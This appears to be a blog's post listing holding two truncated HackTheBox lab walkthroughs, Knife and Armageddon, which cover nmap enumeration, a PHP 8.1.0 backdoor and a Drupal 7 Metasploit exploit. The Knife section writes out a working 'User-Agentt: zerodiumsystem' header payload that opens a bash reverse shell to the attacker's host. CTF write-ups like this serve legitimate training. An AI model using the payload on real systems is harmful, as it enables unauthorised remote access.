Posts

Showing posts from 2021

HackTheBox : Knife Walkthrough

Concepts Learnt : 1. Enumeration 2. Burp Suite 3. PHP Vulnerability 4. Ruby (Knife)

Steps to Enumerate :

Run an Nmap scan to find all the open ports!
Command : nmap 10.10.10.242 -A
10.10.10.242 - IP of the server
-A - This option makes Nmap make an effort to identify the target OS, services and their versions. It also does a traceroute and applies NSE scripts to detect additional information.
-vv - Defines level 2 verbosity for the scan

We see that there are 2 ports open :
22/tcp - SSH port
80/tcp - HTTP port

Let's check the HTTP site on port 80: it is a simple site with no clickable elements!
We can see that the PHP version is 8.1.0, which is vulnerable to the User-Agentt RCE.
Let's run the site through Burp Suite and exploit it. Capture the request using the proxy! Now pass it through the Repeater and use the RCE code to execute!
Command: User-Agentt: zerodiumsystem(“/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’”);
Add your IP and port in the command above before executing! Now run the netcat list

HackTheBox : Armageddon Walkthrough

Concepts Learnt : 1. Enumeration 2. Snap privilege escalation 3. Drupal exploit (Metasploit) 4. python2

Steps to Enumerate :

Run an Nmap scan to find all the open ports!
Command : nmap 10.10.10.233 -A
10.10.10.233 - IP of the server
-A - This option makes Nmap make an effort to identify the target OS, services and their versions. It also does a traceroute and applies NSE scripts to detect additional information.
-vv - Defines level 2 verbosity for the scan

We see that there are 4 ports open :
22/tcp - SSH port
80/tcp - HTTP port
2021/tcp - Servexec (filtered)
7435/tcp - unknown (filtered)

Let's check the HTTP site on port 80: a simple website with a user login!
Let's try the simple admin:password combination to check! Doesn't work!
Checking the page source, we can see that it is Drupal version 7. Let's check if we can work a way around the login page!
Exploring, I found that Drupal 7 can be exploited using Metasploit!
Command : msfconsole
Command : search drupal
We will use the drupalgeddon2 Com